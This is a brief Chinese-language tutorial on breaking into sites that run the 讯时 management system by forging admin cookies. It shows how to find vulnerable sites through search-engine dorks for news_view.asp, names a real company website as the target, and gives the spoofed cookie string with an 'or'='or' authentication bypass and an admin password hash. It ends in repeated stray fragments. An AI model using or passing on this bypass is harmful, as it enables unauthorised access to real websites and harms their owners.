大家好.我是KonBlueSky 今天跟大家带来的教程是利用COOKIE欺骗来入侵讯时管理系统
好了.我们首先来找一个目标网站.大家可以在百度或者GOOGLE上面搜索news_view.asp这个文件
会出来很多这类网站.
我们今天的目标.我事先找好了.我们来看一下.
用到的工具.老兵的COOKIE欺骗工具.如果没有.用啊D的注入工具也行.
http://www.sxdcqc.cn/是一个企业网站
我们来登封一下后台看看.这里是需要密码才能进去的.这里我不考滤什么注入的方式得到管理员的密码
我们今天最主要讲的是通过COOKIE欺骗技术.好了.下面大家看我操作.
用到的欺骗代码.就是下面的这条语句
admindj=1; adminuser=%27or%27%3d%27or%27; adminpass=21232f297a5dfd
%27or%27%3d%27or%27='or'='or'
|
中搜索:
中搜索:
中搜索:
中搜索:
中搜索:
中搜索: